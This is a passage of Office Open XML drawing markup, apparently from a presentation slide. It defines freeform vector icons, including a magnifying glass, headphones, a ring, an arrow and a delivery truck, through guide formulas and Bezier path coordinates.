                  <a:gd name="T53" fmla="*/ 63 h 146"/>
                  <a:gd name="T54" fmla="*/ 81 w 146"/>
                  <a:gd name="T55" fmla="*/ 45 h 146"/>
                  <a:gd name="T56" fmla="*/ 63 w 146"/>
                  <a:gd name="T57" fmla="*/ 45 h 146"/>
                  <a:gd name="T58" fmla="*/ 63 w 146"/>
                  <a:gd name="T59" fmla="*/ 2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6" h="146">
                    <a:moveTo>
                      <a:pt x="140" y="123"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="94"/>
                      <a:pt x="106" y="94"/>
                      <a:pt x="106" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="91"/>
                      <a:pt x="99" y="89"/>
                      <a:pt x="96" y="89"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="80"/>
                      <a:pt x="109" y="67"/>
                      <a:pt x="109" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="24"/>
                      <a:pt x="84" y="0"/>
                      <a:pt x="54" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="0"/>
                      <a:pt x="0" y="24"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="84"/>
                      <a:pt x="24" y="108"/>
                      <a:pt x="54" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="108"/>
                      <a:pt x="80" y="103"/>
                      <a:pt x="90" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="98"/>
                      <a:pt x="91" y="102"/>
                      <a:pt x="94" y="106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8" y="146"/>
                      <a:pt x="136" y="146"/>
                      <a:pt x="141" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="136"/>
                      <a:pt x="146" y="128"/>
                      <a:pt x="140" y="123"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="54" y="90"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="90"/>
                      <a:pt x="18" y="74"/>
                      <a:pt x="18" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="34"/>
                      <a:pt x="34" y="18"/>
                      <a:pt x="54" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="18"/>
                      <a:pt x="91" y="34"/>
                      <a:pt x="91" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="74"/>
                      <a:pt x="74" y="90"/>
                      <a:pt x="54" y="90"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="63" y="27"/>
                    </a:move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7" y="63"/>
                      <a:pt x="27" y="63"/>
                      <a:pt x="27" y="63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63" y="81"/>
                      <a:pt x="63" y="81"/>
                      <a:pt x="63" y="81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63" y="45"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="63" y="45"/>
                    </a:cubicBez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0" name="Freeform 135">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F088C78-C25D-4AD4-A636-219C0FF472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48921" y="4744191"/>
                <a:ext cx="272069" cy="275983"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 16 w 85"/>
                  <a:gd name="T1" fmla="*/ 49 h 86"/>
                  <a:gd name="T2" fmla="*/ 16 w 85"/>
                  <a:gd name="T3" fmla="*/ 86 h 86"/>
                  <a:gd name="T4" fmla="*/ 18 w 85"/>
                  <a:gd name="T5" fmla="*/ 86 h 86"/>
                  <a:gd name="T6" fmla="*/ 21 w 85"/>
                  <a:gd name="T7" fmla="*/ 86 h 86"/>
                  <a:gd name="T8" fmla="*/ 21 w 85"/>
                  <a:gd name="T9" fmla="*/ 49 h 86"/>
                  <a:gd name="T10" fmla="*/ 18 w 85"/>
                  <a:gd name="T11" fmla="*/ 49 h 86"/>
                  <a:gd name="T12" fmla="*/ 16 w 85"/>
                  <a:gd name="T13" fmla="*/ 49 h 86"/>
                  <a:gd name="T14" fmla="*/ 64 w 85"/>
                  <a:gd name="T15" fmla="*/ 49 h 86"/>
                  <a:gd name="T16" fmla="*/ 64 w 85"/>
                  <a:gd name="T17" fmla="*/ 86 h 86"/>
                  <a:gd name="T18" fmla="*/ 67 w 85"/>
                  <a:gd name="T19" fmla="*/ 86 h 86"/>
                  <a:gd name="T20" fmla="*/ 69 w 85"/>
                  <a:gd name="T21" fmla="*/ 86 h 86"/>
                  <a:gd name="T22" fmla="*/ 69 w 85"/>
                  <a:gd name="T23" fmla="*/ 49 h 86"/>
                  <a:gd name="T24" fmla="*/ 67 w 85"/>
                  <a:gd name="T25" fmla="*/ 49 h 86"/>
                  <a:gd name="T26" fmla="*/ 64 w 85"/>
                  <a:gd name="T27" fmla="*/ 49 h 86"/>
                  <a:gd name="T28" fmla="*/ 85 w 85"/>
                  <a:gd name="T29" fmla="*/ 43 h 86"/>
                  <a:gd name="T30" fmla="*/ 42 w 85"/>
                  <a:gd name="T31" fmla="*/ 0 h 86"/>
                  <a:gd name="T32" fmla="*/ 0 w 85"/>
                  <a:gd name="T33" fmla="*/ 43 h 86"/>
                  <a:gd name="T34" fmla="*/ 2 w 85"/>
                  <a:gd name="T35" fmla="*/ 58 h 86"/>
                  <a:gd name="T36" fmla="*/ 0 w 85"/>
                  <a:gd name="T37" fmla="*/ 67 h 86"/>
                  <a:gd name="T38" fmla="*/ 10 w 85"/>
                  <a:gd name="T39" fmla="*/ 84 h 86"/>
                  <a:gd name="T40" fmla="*/ 10 w 85"/>
                  <a:gd name="T41" fmla="*/ 51 h 86"/>
                  <a:gd name="T42" fmla="*/ 6 w 85"/>
                  <a:gd name="T43" fmla="*/ 54 h 86"/>
                  <a:gd name="T44" fmla="*/ 5 w 85"/>
                  <a:gd name="T45" fmla="*/ 46 h 86"/>
                  <a:gd name="T46" fmla="*/ 42 w 85"/>
                  <a:gd name="T47" fmla="*/ 8 h 86"/>
                  <a:gd name="T48" fmla="*/ 80 w 85"/>
                  <a:gd name="T49" fmla="*/ 46 h 86"/>
                  <a:gd name="T50" fmla="*/ 79 w 85"/>
                  <a:gd name="T51" fmla="*/ 54 h 86"/>
                  <a:gd name="T52" fmla="*/ 75 w 85"/>
                  <a:gd name="T53" fmla="*/ 51 h 86"/>
                  <a:gd name="T54" fmla="*/ 75 w 85"/>
                  <a:gd name="T55" fmla="*/ 84 h 86"/>
                  <a:gd name="T56" fmla="*/ 85 w 85"/>
                  <a:gd name="T57" fmla="*/ 67 h 86"/>
                  <a:gd name="T58" fmla="*/ 83 w 85"/>
                  <a:gd name="T59" fmla="*/ 58 h 86"/>
                  <a:gd name="T60" fmla="*/ 85 w 85"/>
                  <a:gd name="T61" fmla="*/ 4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5" h="86">
                    <a:moveTo>
                      <a:pt x="16" y="49"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="86"/>
                      <a:pt x="16" y="86"/>
                      <a:pt x="16" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="86"/>
                      <a:pt x="17" y="86"/>
                      <a:pt x="18" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="86"/>
                      <a:pt x="21" y="86"/>
                      <a:pt x="21" y="86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17" y="49"/>
                      <a:pt x="17" y="49"/>
                      <a:pt x="16" y="49"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="64" y="49"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="86"/>
                      <a:pt x="64" y="86"/>
                      <a:pt x="64" y="86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68" y="86"/>
                      <a:pt x="68" y="86"/>
                      <a:pt x="69" y="86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68" y="49"/>
                      <a:pt x="68" y="49"/>
                      <a:pt x="67" y="49"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64" y="49"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="85" y="43"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="20"/>
                      <a:pt x="66" y="0"/>
                      <a:pt x="42" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="0"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="48"/>
                      <a:pt x="0" y="53"/>
                      <a:pt x="2" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="61"/>
                      <a:pt x="0" y="64"/>
                      <a:pt x="0" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="75"/>
                      <a:pt x="4" y="81"/>
                      <a:pt x="10" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="51"/>
                      <a:pt x="10" y="51"/>
                      <a:pt x="10" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="51"/>
                      <a:pt x="7" y="52"/>
                      <a:pt x="6" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="51"/>
                      <a:pt x="5" y="49"/>
                      <a:pt x="5" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="25"/>
                      <a:pt x="22" y="8"/>
                      <a:pt x="42" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="8"/>
                      <a:pt x="80" y="25"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="49"/>
                      <a:pt x="80" y="51"/>
                      <a:pt x="79" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="52"/>
                      <a:pt x="76" y="51"/>
                      <a:pt x="75" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="84"/>
                      <a:pt x="75" y="84"/>
                      <a:pt x="75" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="81"/>
                      <a:pt x="85" y="75"/>
                      <a:pt x="85" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="64"/>
                      <a:pt x="84" y="61"/>
                      <a:pt x="83" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="53"/>
                      <a:pt x="85" y="48"/>
                      <a:pt x="8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1" name="Freeform 136">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3709F614-FEBB-40C9-BAD2-FB15347878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35925" y="4409487"/>
                <a:ext cx="332746" cy="330788"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 52 w 104"/>
                  <a:gd name="T1" fmla="*/ 0 h 104"/>
                  <a:gd name="T2" fmla="*/ 0 w 104"/>
                  <a:gd name="T3" fmla="*/ 52 h 104"/>
                  <a:gd name="T4" fmla="*/ 52 w 104"/>
                  <a:gd name="T5" fmla="*/ 104 h 104"/>
                  <a:gd name="T6" fmla="*/ 104 w 104"/>
                  <a:gd name="T7" fmla="*/ 52 h 104"/>
                  <a:gd name="T8" fmla="*/ 52 w 104"/>
                  <a:gd name="T9" fmla="*/ 0 h 104"/>
                  <a:gd name="T10" fmla="*/ 32 w 104"/>
                  <a:gd name="T11" fmla="*/ 52 h 104"/>
                  <a:gd name="T12" fmla="*/ 52 w 104"/>
                  <a:gd name="T13" fmla="*/ 32 h 104"/>
                  <a:gd name="T14" fmla="*/ 72 w 104"/>
                  <a:gd name="T15" fmla="*/ 52 h 104"/>
                  <a:gd name="T16" fmla="*/ 52 w 104"/>
                  <a:gd name="T17" fmla="*/ 71 h 104"/>
                  <a:gd name="T18" fmla="*/ 32 w 104"/>
                  <a:gd name="T19" fmla="*/ 52 h 104"/>
                  <a:gd name="T20" fmla="*/ 94 w 104"/>
                  <a:gd name="T21" fmla="*/ 69 h 104"/>
                  <a:gd name="T22" fmla="*/ 94 w 104"/>
                  <a:gd name="T23" fmla="*/ 69 h 104"/>
                  <a:gd name="T24" fmla="*/ 76 w 104"/>
                  <a:gd name="T25" fmla="*/ 62 h 104"/>
                  <a:gd name="T26" fmla="*/ 78 w 104"/>
                  <a:gd name="T27" fmla="*/ 52 h 104"/>
                  <a:gd name="T28" fmla="*/ 76 w 104"/>
                  <a:gd name="T29" fmla="*/ 42 h 104"/>
                  <a:gd name="T30" fmla="*/ 89 w 104"/>
                  <a:gd name="T31" fmla="*/ 37 h 104"/>
                  <a:gd name="T32" fmla="*/ 94 w 104"/>
                  <a:gd name="T33" fmla="*/ 34 h 104"/>
                  <a:gd name="T34" fmla="*/ 98 w 104"/>
                  <a:gd name="T35" fmla="*/ 52 h 104"/>
                  <a:gd name="T36" fmla="*/ 94 w 104"/>
                  <a:gd name="T37" fmla="*/ 69 h 104"/>
                  <a:gd name="T38" fmla="*/ 69 w 104"/>
                  <a:gd name="T39" fmla="*/ 10 h 104"/>
                  <a:gd name="T40" fmla="*/ 69 w 104"/>
                  <a:gd name="T41" fmla="*/ 10 h 104"/>
                  <a:gd name="T42" fmla="*/ 69 w 104"/>
                  <a:gd name="T43" fmla="*/ 10 h 104"/>
                  <a:gd name="T44" fmla="*/ 62 w 104"/>
                  <a:gd name="T45" fmla="*/ 28 h 104"/>
                  <a:gd name="T46" fmla="*/ 52 w 104"/>
                  <a:gd name="T47" fmla="*/ 26 h 104"/>
                  <a:gd name="T48" fmla="*/ 42 w 104"/>
                  <a:gd name="T49" fmla="*/ 28 h 104"/>
                  <a:gd name="T50" fmla="*/ 38 w 104"/>
                  <a:gd name="T51" fmla="*/ 19 h 104"/>
                  <a:gd name="T52" fmla="*/ 35 w 104"/>
                  <a:gd name="T53" fmla="*/ 10 h 104"/>
                  <a:gd name="T54" fmla="*/ 52 w 104"/>
                  <a:gd name="T55" fmla="*/ 6 h 104"/>
                  <a:gd name="T56" fmla="*/ 69 w 104"/>
                  <a:gd name="T57" fmla="*/ 10 h 104"/>
                  <a:gd name="T58" fmla="*/ 10 w 104"/>
                  <a:gd name="T59" fmla="*/ 34 h 104"/>
                  <a:gd name="T60" fmla="*/ 19 w 104"/>
                  <a:gd name="T61" fmla="*/ 38 h 104"/>
                  <a:gd name="T62" fmla="*/ 28 w 104"/>
                  <a:gd name="T63" fmla="*/ 42 h 104"/>
                  <a:gd name="T64" fmla="*/ 26 w 104"/>
                  <a:gd name="T65" fmla="*/ 52 h 104"/>
                  <a:gd name="T66" fmla="*/ 28 w 104"/>
                  <a:gd name="T67" fmla="*/ 62 h 104"/>
                  <a:gd name="T68" fmla="*/ 10 w 104"/>
                  <a:gd name="T69" fmla="*/ 69 h 104"/>
                  <a:gd name="T70" fmla="*/ 6 w 104"/>
                  <a:gd name="T71" fmla="*/ 52 h 104"/>
                  <a:gd name="T72" fmla="*/ 10 w 104"/>
                  <a:gd name="T73" fmla="*/ 34 h 104"/>
                  <a:gd name="T74" fmla="*/ 35 w 104"/>
                  <a:gd name="T75" fmla="*/ 94 h 104"/>
                  <a:gd name="T76" fmla="*/ 37 w 104"/>
                  <a:gd name="T77" fmla="*/ 88 h 104"/>
                  <a:gd name="T78" fmla="*/ 42 w 104"/>
                  <a:gd name="T79" fmla="*/ 76 h 104"/>
                  <a:gd name="T80" fmla="*/ 52 w 104"/>
                  <a:gd name="T81" fmla="*/ 78 h 104"/>
                  <a:gd name="T82" fmla="*/ 62 w 104"/>
                  <a:gd name="T83" fmla="*/ 76 h 104"/>
                  <a:gd name="T84" fmla="*/ 69 w 104"/>
                  <a:gd name="T85" fmla="*/ 94 h 104"/>
                  <a:gd name="T86" fmla="*/ 69 w 104"/>
                  <a:gd name="T87" fmla="*/ 94 h 104"/>
                  <a:gd name="T88" fmla="*/ 69 w 104"/>
                  <a:gd name="T89" fmla="*/ 94 h 104"/>
                  <a:gd name="T90" fmla="*/ 52 w 104"/>
                  <a:gd name="T91" fmla="*/ 97 h 104"/>
                  <a:gd name="T92" fmla="*/ 35 w 104"/>
                  <a:gd name="T93" fmla="*/ 9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4" h="104">
                    <a:moveTo>
                      <a:pt x="52" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="0"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="81"/>
                      <a:pt x="23" y="104"/>
                      <a:pt x="52" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="104"/>
                      <a:pt x="104" y="81"/>
                      <a:pt x="104" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="23"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="52" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="52"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="41"/>
                      <a:pt x="41" y="32"/>
                      <a:pt x="52" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="32"/>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="63"/>
                      <a:pt x="63" y="71"/>
                      <a:pt x="52" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="71"/>
                      <a:pt x="32" y="63"/>
                      <a:pt x="32" y="52"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="94" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="69"/>
                      <a:pt x="94" y="69"/>
                      <a:pt x="94" y="69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7" y="59"/>
                      <a:pt x="78" y="55"/>
                      <a:pt x="78" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="48"/>
                      <a:pt x="77" y="45"/>
                      <a:pt x="76" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="37"/>
                      <a:pt x="89" y="37"/>
                      <a:pt x="89" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="34"/>
                      <a:pt x="94" y="34"/>
                      <a:pt x="94" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="40"/>
                      <a:pt x="98" y="46"/>
                      <a:pt x="98" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="58"/>
                      <a:pt x="96" y="64"/>
                      <a:pt x="94" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="69" y="10"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="10"/>
                      <a:pt x="69" y="10"/>
                      <a:pt x="69" y="10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59" y="26"/>
                      <a:pt x="56" y="26"/>
                      <a:pt x="52" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="26"/>
                      <a:pt x="45" y="26"/>
                      <a:pt x="42" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="19"/>
                      <a:pt x="38" y="19"/>
                      <a:pt x="38" y="1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40" y="7"/>
                      <a:pt x="46" y="6"/>
                      <a:pt x="52" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="6"/>
                      <a:pt x="64" y="7"/>
                      <a:pt x="69" y="10"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="38"/>
                      <a:pt x="19" y="38"/>
                      <a:pt x="19" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="42"/>
                      <a:pt x="28" y="42"/>
                      <a:pt x="28" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="45"/>
                      <a:pt x="26" y="48"/>
                      <a:pt x="26" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="55"/>
                      <a:pt x="27" y="59"/>
                      <a:pt x="28" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="69"/>
                      <a:pt x="10" y="69"/>
                      <a:pt x="10" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="64"/>
                      <a:pt x="6" y="58"/>
                      <a:pt x="6" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="46"/>
                      <a:pt x="8" y="40"/>
                      <a:pt x="10" y="34"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="35" y="94"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="88"/>
                      <a:pt x="37" y="88"/>
                      <a:pt x="37" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="76"/>
                      <a:pt x="42" y="76"/>
                      <a:pt x="42" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="77"/>
                      <a:pt x="48" y="78"/>
                      <a:pt x="52" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="78"/>
                      <a:pt x="59" y="77"/>
                      <a:pt x="62" y="76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64" y="96"/>
                      <a:pt x="58" y="97"/>
                      <a:pt x="52" y="97"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="97"/>
                      <a:pt x="40" y="96"/>
                      <a:pt x="35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2" name="Freeform 137">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35E55E7B-F9C2-4BB6-8D81-1D331D103C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5749" y="4810740"/>
                <a:ext cx="383636" cy="387551"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 120"/>
                  <a:gd name="T1" fmla="*/ 70 h 121"/>
                  <a:gd name="T2" fmla="*/ 10 w 120"/>
                  <a:gd name="T3" fmla="*/ 80 h 121"/>
                  <a:gd name="T4" fmla="*/ 20 w 120"/>
                  <a:gd name="T5" fmla="*/ 70 h 121"/>
                  <a:gd name="T6" fmla="*/ 20 w 120"/>
                  <a:gd name="T7" fmla="*/ 34 h 121"/>
                  <a:gd name="T8" fmla="*/ 103 w 120"/>
                  <a:gd name="T9" fmla="*/ 117 h 121"/>
                  <a:gd name="T10" fmla="*/ 117 w 120"/>
                  <a:gd name="T11" fmla="*/ 117 h 121"/>
                  <a:gd name="T12" fmla="*/ 120 w 120"/>
                  <a:gd name="T13" fmla="*/ 110 h 121"/>
                  <a:gd name="T14" fmla="*/ 117 w 120"/>
                  <a:gd name="T15" fmla="*/ 103 h 121"/>
                  <a:gd name="T16" fmla="*/ 34 w 120"/>
                  <a:gd name="T17" fmla="*/ 20 h 121"/>
                  <a:gd name="T18" fmla="*/ 70 w 120"/>
                  <a:gd name="T19" fmla="*/ 20 h 121"/>
                  <a:gd name="T20" fmla="*/ 80 w 120"/>
                  <a:gd name="T21" fmla="*/ 10 h 121"/>
                  <a:gd name="T22" fmla="*/ 70 w 120"/>
                  <a:gd name="T23" fmla="*/ 0 h 121"/>
                  <a:gd name="T24" fmla="*/ 0 w 120"/>
                  <a:gd name="T25" fmla="*/ 0 h 121"/>
                  <a:gd name="T26" fmla="*/ 0 w 120"/>
                  <a:gd name="T27" fmla="*/ 7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0" h="121">
                    <a:moveTo>
                      <a:pt x="0" y="70"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="76"/>
                      <a:pt x="4" y="80"/>
                      <a:pt x="10" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="80"/>
                      <a:pt x="20" y="76"/>
                      <a:pt x="20" y="70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107" y="121"/>
                      <a:pt x="113" y="121"/>
                      <a:pt x="117" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="115"/>
                      <a:pt x="120" y="113"/>
                      <a:pt x="120" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="108"/>
                      <a:pt x="119" y="105"/>
                      <a:pt x="117" y="103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70" y="20"/>
                      <a:pt x="70" y="20"/>
                      <a:pt x="70" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="20"/>
                      <a:pt x="80" y="15"/>
                      <a:pt x="80" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="4"/>
                      <a:pt x="75" y="0"/>
                      <a:pt x="7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3" name="Freeform 138">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49C37B46-72EC-4460-8317-9393D70C3C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26843" y="3544348"/>
                <a:ext cx="399295" cy="330788"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 125 w 125"/>
                  <a:gd name="T1" fmla="*/ 55 h 103"/>
                  <a:gd name="T2" fmla="*/ 110 w 125"/>
                  <a:gd name="T3" fmla="*/ 24 h 103"/>
                  <a:gd name="T4" fmla="*/ 86 w 125"/>
                  <a:gd name="T5" fmla="*/ 24 h 103"/>
                  <a:gd name="T6" fmla="*/ 86 w 125"/>
                  <a:gd name="T7" fmla="*/ 8 h 103"/>
                  <a:gd name="T8" fmla="*/ 78 w 125"/>
                  <a:gd name="T9" fmla="*/ 0 h 103"/>
                  <a:gd name="T10" fmla="*/ 8 w 125"/>
                  <a:gd name="T11" fmla="*/ 0 h 103"/>
                  <a:gd name="T12" fmla="*/ 0 w 125"/>
                  <a:gd name="T13" fmla="*/ 8 h 103"/>
                  <a:gd name="T14" fmla="*/ 0 w 125"/>
                  <a:gd name="T15" fmla="*/ 71 h 103"/>
                  <a:gd name="T16" fmla="*/ 8 w 125"/>
                  <a:gd name="T17" fmla="*/ 79 h 103"/>
                  <a:gd name="T18" fmla="*/ 18 w 125"/>
                  <a:gd name="T19" fmla="*/ 79 h 103"/>
                  <a:gd name="T20" fmla="*/ 16 w 125"/>
                  <a:gd name="T21" fmla="*/ 87 h 103"/>
                  <a:gd name="T22" fmla="*/ 31 w 125"/>
                  <a:gd name="T23" fmla="*/ 103 h 103"/>
                  <a:gd name="T24" fmla="*/ 47 w 125"/>
                  <a:gd name="T25" fmla="*/ 87 h 103"/>
                  <a:gd name="T26" fmla="*/ 45 w 125"/>
                  <a:gd name="T27" fmla="*/ 79 h 103"/>
                  <a:gd name="T28" fmla="*/ 88 w 125"/>
                  <a:gd name="T29" fmla="*/ 79 h 103"/>
                  <a:gd name="T30" fmla="*/ 86 w 125"/>
                  <a:gd name="T31" fmla="*/ 87 h 103"/>
                  <a:gd name="T32" fmla="*/ 102 w 125"/>
                  <a:gd name="T33" fmla="*/ 103 h 103"/>
                  <a:gd name="T34" fmla="*/ 118 w 125"/>
                  <a:gd name="T35" fmla="*/ 87 h 103"/>
                  <a:gd name="T36" fmla="*/ 115 w 125"/>
                  <a:gd name="T37" fmla="*/ 79 h 103"/>
                  <a:gd name="T38" fmla="*/ 125 w 125"/>
                  <a:gd name="T39" fmla="*/ 79 h 103"/>
                  <a:gd name="T40" fmla="*/ 125 w 125"/>
                  <a:gd name="T41" fmla="*/ 55 h 103"/>
                  <a:gd name="T42" fmla="*/ 86 w 125"/>
                  <a:gd name="T43" fmla="*/ 55 h 103"/>
                  <a:gd name="T44" fmla="*/ 86 w 125"/>
                  <a:gd name="T45" fmla="*/ 36 h 103"/>
                  <a:gd name="T46" fmla="*/ 102 w 125"/>
                  <a:gd name="T47" fmla="*/ 36 h 103"/>
                  <a:gd name="T48" fmla="*/ 112 w 125"/>
                  <a:gd name="T49" fmla="*/ 55 h 103"/>
                  <a:gd name="T50" fmla="*/ 86 w 125"/>
                  <a:gd name="T51" fmla="*/ 5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5" h="103">
                    <a:moveTo>
                      <a:pt x="125" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="24"/>
                      <a:pt x="110" y="24"/>
                      <a:pt x="110" y="24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6" y="4"/>
                      <a:pt x="83" y="0"/>
                      <a:pt x="7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16" y="81"/>
                      <a:pt x="16" y="84"/>
                      <a:pt x="16" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="96"/>
                      <a:pt x="23" y="103"/>
                      <a:pt x="31" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="103"/>
                      <a:pt x="47" y="96"/>
